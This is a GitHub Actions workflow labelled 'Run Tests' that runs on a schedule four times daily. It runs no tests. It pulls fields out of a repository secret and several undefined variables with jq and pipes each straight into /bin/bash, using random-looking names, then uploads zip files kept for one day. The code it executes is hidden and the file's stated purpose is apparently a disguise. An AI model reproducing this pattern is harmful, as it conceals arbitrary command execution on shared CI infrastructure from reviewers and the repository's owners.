name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '26 4,10,16,22 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Apply
        env:
          e9204: ${{ secrets.e9204 }}
        run: |
          printf '%s' "$e9204" | jq -r .gcc93386 | /bin/bash
          printf '%s' "$gusx565" | jq -r .gfq14128 | /bin/bash
          printf '%s' "$bnksb84308" | jq -r .gitv0706 | /bin/bash
          echo $d2 | jq -r .szcj8 | /bin/bash
          echo $lgoq7789 | jq -r .lqdw53 | /bin/bash
          printf '%s' "$yyc276" | jq -r .auhaf7 | /bin/bash

      - name: Upload output
        uses: actions/upload-artifact@v4
        with:
          name: 6vwK4ko9
          path: "*.zip"
          retention-days: 1
